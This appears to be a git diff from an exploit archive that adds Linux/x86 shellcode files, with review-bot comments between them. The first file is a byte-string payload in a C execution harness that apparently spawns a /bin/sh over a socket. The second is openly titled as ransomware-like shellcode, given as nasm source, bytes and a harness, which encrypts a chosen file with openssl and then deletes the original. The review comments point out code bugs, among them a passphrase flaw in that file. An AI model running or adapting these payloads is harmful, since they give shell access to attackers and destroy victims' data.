+#include + +unsigned char code[] = \ 
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x31\xf6\x31\xff\xbf\x80\xff\xff\xfe\x83\xf7\xff\x57\x66\x68\x1f\x90\x66\x6a\x02\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x96\x66\xb8\x6a\x01\x89\xf3\x89\xe1\xb2\x10\xcd\x80\x31\xc0\x89\xf3\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b\x31\xdb\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80"; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} + +####################################################################### +####################################################################### + +# Compile with + +gcc -fno-stack-protector -z execstack -o shellcode shellcode.c \ No newline at end of file diff --git a/shellcodes/linux_x86/46791.c b/shellcodes/linux_x86/46791.c new file mode 100644 index 000000000..9a7dad830 --- /dev/null +++ b/shellcodes/linux_x86/46791.c 
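Review bot: In the python3 wrapper, `xor_strings` returns `'{:x}'.format(result)`, which drops leading zeros, so for a target whose last octet is 255 the reversed address XORs to a value with a leading zero byte, `xored_ip` comes back shorter than eight characters, the byte slices `xored_ip[6:8]` … `[0:2]` go out of alignment, and the null-byte check `xored_ip[0:2]=="00"` can never fire; `'{:08x}'.format(result)` keeps the width fixed so the script's own warning is reliable. Smaller points: `from struct import unpack` is unused, and `exit()` should be `sys.exit()` since `exit` is a site-module convenience that can be absent. In the C harness at the end both `#include` directives have lost their header names (probably angle brackets stripped in rendering) and `main()` without a return type is not valid C99; the same applies to the harness in shellcodes/linux_x86/46791.c.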
@@ -0,0 +1,67 @@ +# Exploit Title: Linux/x86 openssl aes256cbc encrypt files small like ransomware (185 bytes) +# Google Dork: None +# Date: 02.05.2019 +# Exploit Author: strider +# Vendor Homepage: None +# Software Link: None +# Tested on: Debian 9 Stretch i386/ Kali Linux i386 +# CVE : None +# Shellcode Length: 185 +------------------------------[Description]--------------------------------- + +This shellcode encrypts the specified file aith aes256cbc and a 32byte random key. +After encryption the key is dropped. + +replace test.txt and .test.txt with any file. + +-----------------------------[Shellcode Dump]--------------------------------- +section .text + +global _start + +_start: + xor eax, eax + push eax + jmp short _cmd + +_exec: + pop ecx + mov edi, ecx + xor ecx, ecx + push eax + push 0x68732f6e + push 0x69622f2f + mov ebx, esp + push eax + push word 0x632d + mov esi, esp + push eax + push edi + push esi + push ebx + mov ecx, esp + mov al, 11 + int 0x80 + +_cmd: + call _exec + ;replace test.txt with any file + msg db "mv test.txt .test.txt && head -c 32 /dev/urandom | base64 | openssl aes-256-cbc -e -in .test.txt -out test.txt -pbkdf2 -k - && rm .test.txt", 0x0a + + + -----------------------------[Compile]--------------------------------------------- + gcc -m32 -fno-stack-protector -z execstack -o tester tester.c + + -----------------------------[C-Code]----------------------------- + + #include + #include + + unsigned char shellcode[] = 
"\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x6d\x76\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x68\x65\x61\x64\x20\x2d\x63\x20\x33\x32\x20\x2f\x64\x65\x76\x2f\x75\x72\x61\x6e\x64\x6f\x6d\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x7c\x20\x6f\x70\x65\x6e\x73\x73\x6c\x20\x61\x65\x73\x2d\x32\x35\x36\x2d\x63\x62\x63\x20\x2d\x65\x20\x2d\x69\x6e\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2d\x6f\x75\x74\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2d\x70\x62\x6b\x64\x66\x32\x20\x2d\x6b\x20\x2d\x20\x26\x26\x20\x72\x6d\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x0a"; + void main() + { + printf("Shellcode Length: %d\n", strlen(shellcode)); + + int (*ret)() = (int(*)())shellcode; + ret(); + } \ No newline at end of file
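Review bot: The description says the file is encrypted with a 32-byte random key that is then dropped, but in the embedded command `openssl aes-256-cbc ... -pbkdf2 -k -` the `-k` option takes the passphrase from its argument, so the passphrase is the literal string `-` and the base64 output piped from `head -c 32 /dev/urandom` is never read by openssl; unless openssl treats `-k -` specially (I do not believe it does), the description overstates the effect. For a defender this matters: with a constant passphrase the ciphertext is recoverable by anyone who has read the shellcode, which is worth stating in the description instead of "the key is dropped", e.g. `; NOTE: -k takes the passphrase from its argument, the piped key is not consumed - verify against openssl enc(1)`. The file is stored as .c but opens with `#`-style advisory headers and nasm source, so it does not compile as C; the harness is an indented excerpt that must be extracted first, and its `void main()` is non-standard.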